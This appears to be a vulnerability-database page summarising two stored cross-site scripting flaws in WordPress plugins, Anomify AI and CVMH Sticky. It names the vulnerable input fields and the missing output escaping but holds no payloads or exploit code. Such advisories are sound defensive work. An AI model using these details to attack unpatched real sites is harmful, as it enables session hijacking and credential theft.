Stored Cross-Site Scripting in the Anomify AI WordPress plugin (versions ≤ 0.3.6) allows authenticated administrators to persist malicious scripts in the plugin's settings that execute in any user's browser upon visiting the settings page. The flaw exists because the plugin applies sanitize_text_field() to the anomify_api_key input - a function that strips HTML tags but does not encode double-quote characters - then echoes the stored value directly into an HTML attribute context (value="...") without the appropriate esc_attr() call. No public exploit code has been identified at time of analysis, and CISA KEV does not list this CVE; the CVSS score of 4.4 reflects the high privilege bar and high complexity required to exploit.

WordPress XSS
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the CVMH Sticky plugin for WordPress (versions ≤ 2.5.6) enables authenticated contributors to inject persistent JavaScript via the `readmoretext` attribute of the `[cvmh-sticky]` shortcode. The payload executes in the browser of any visitor loading a page containing the injected shortcode, enabling session hijacking, credential theft, or privilege escalation by targeting administrators. No public exploit has been identified at the time of analysis, and this vulnerability is not listed in CISA KEV, but Wordfence has confirmed the flaw with direct code-level references.

WordPress XSS
NVD

Quick Facts

Typical Severity: MEDIUM
Category: web
Total CVEs: 11005
